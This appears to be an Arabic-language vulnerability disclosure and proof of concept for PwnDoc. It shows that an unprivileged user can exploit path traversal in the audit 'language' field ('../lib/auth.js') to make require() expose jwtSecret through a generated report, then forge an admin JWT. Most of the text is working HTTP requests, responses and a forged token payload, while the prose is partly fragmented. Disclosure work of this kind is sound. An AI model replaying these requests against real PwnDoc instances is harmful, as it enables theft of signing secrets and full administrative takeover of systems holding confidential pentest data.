
[PoC] تصعيد الامتيازات وتنفيذ الأكواد عبر LFI في PwnDoC
أداة PwnDoc معرضة لهجمات اجتياز المسار (path traversal) وتضمين الملفات المحلية (LFI)، مما يسمح للمستخدمين غير المميزين بكشف أسرار JWT وتحقيق تنفيذ الأوامر.
المتطلبات:
userfinding.vulnType أو finding.categoryتتكون سلسلة الثغرات من الأجزاء التالية:
AuditSchema.language على مستوى كل من النموذج (model) والنقطة الطرفية (endpoint). (انظر /backend/src/models/audit.js, السطر: 71، /backend/src/routes/audit.js, السطر: 57)require مع معامل AuditSchema.language الذي يوفره المستخدم أثناء إنشاء التقرير. (انظر /backend/src/translate/index.js, السطر: 10، /backend/src/lib/report-generator.js, الأسطر: 24-25, 477, 487)jwtSecret و jwtRefreshSecret عبر تصدير الوحدات (module exports) في ملف auth.js. (انظر /backend/src/lib/auth.js, الأسطر: 17-21)js (تتطلب صلاحية template:create).../lib/auth.js كـ language، سيتم لاحقاً تحميل الملف وتنفيذه باستخدام دالة require ونتيجة لذلك سيتم تصدير كل من jwtSecret و jwtRefreshSecret.الطلب:
POST /api/audits HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 73
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}
{"name":"privesc-poc","language":"../lib/auth.js","auditType":"tested"}
الرد:
HTTP/1.1 201 Created
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 598
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition
{"status":"success","datas":{"message":"Audit created successfully","audit":{"collaborators":[],"reviewers":[],"state":"EDIT","approvals":[],"_id":"637a49086f5a2e0012dd58c5","name":"privsec-poc","language":"../lib/auth.js","auditType":"tested","creator":"637a2065ab932e0012015580","sections":[],"customFields":[],"sortFindings":[{"category":"jjj","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true},{"category":"dd","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true}],"scope":[],"findings":[],"createdAt":"2022-11-20T15:34:32.246Z","updatedAt":"2022-11-20T15:34:32.246Z","__v":0}}}
finding.vulnType - {vulnType} أو finding.category - {category}. انظر وثائق القوالب**الطلب:
PUT /api/audits/637a49086f5a2e0012dd58c5/general HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 207
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}
{"collaborators":[],"reviewers":[],"_id":"637a49086f5a2e0012dd58c5","name":"privesc-poc","language":"../lib/auth.js","auditType":"tested","customFields":[],"template":"6377d57e5cccb10012049dbb","scope":[]}
الرد:
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:43 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition
{"status":"success","datas":"Audit General updated successfully"}
category أو vulnType يجب أن تحتوي على jwtSecret.**الطلب:
POST /api/audits/637a49086f5a2e0012dd58c5/findings HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 368
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Referer: https://127.0.0.1:8443/audits/637a2106ab932e0012015583/findings/add
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}
{"title":"dsdsd","vulnType":"prod","description":"{description}","observation":"{observation}","references":[],"cvssv3":"CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L","category":null,"customFields":[], "category":"jwtSecret", "vulnType":"jwtRefreshSecret"}
الرد:
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:54 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition
{"status":"success","datas":"Audit Finding created successfully"}
jwtSecret من مستند docx الذي تم إنشاؤه.الطلب:
GET /api/audits/637a49086f5a2e0012dd58c5/generate HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Language: en-GB,en;q=0.9
Referer: https://127.0.0.1:8443/audits/637a2106ab932e0012015583/findings/add
Connection: keep-alive
Cookie: token=JWT%20{token}
الرد:
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:37:34 GMT
Content-Type: application/octet-stream
Content-Length: 98134
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition
Content-Disposition: attachment; filename="rce-poc.docx"
{doc-content}
role إلى admin داخل رمز JWT الخاص بك وتوقيعه باستخدام jwtSecret الذي تم الحصول عليه.حمولة JWT:
{
"id": "637a2065ab932e0012015580",
"username": "justuser",
"role": "admin",
"firstname": "justuser",
"lastname": "justuser",
"email": "[email protected]",
"phone": "12345",
"roles": [
"audits:create",
"audits:read",
"audits:update",
"audits:delete",
"images:create",
"images:read",
"clients:create",
"clients:read",
"clients:update",
"clients:delete",
"companies:create",
"companies:read",
"companies:update",
"companies:delete",
"languages:read",
"audit-types:read",
"vulnerability-types:read",
"vulnerability-categories:read",
"sections:read",
"templates:read",
"users:read",
"roles:read",
"vulnerabilities:read",
"vulnerability-updates:create",
"custom-fields:read",
"settings:read-public"
],
"iat": 1668958053,
"exp": 1668958953
}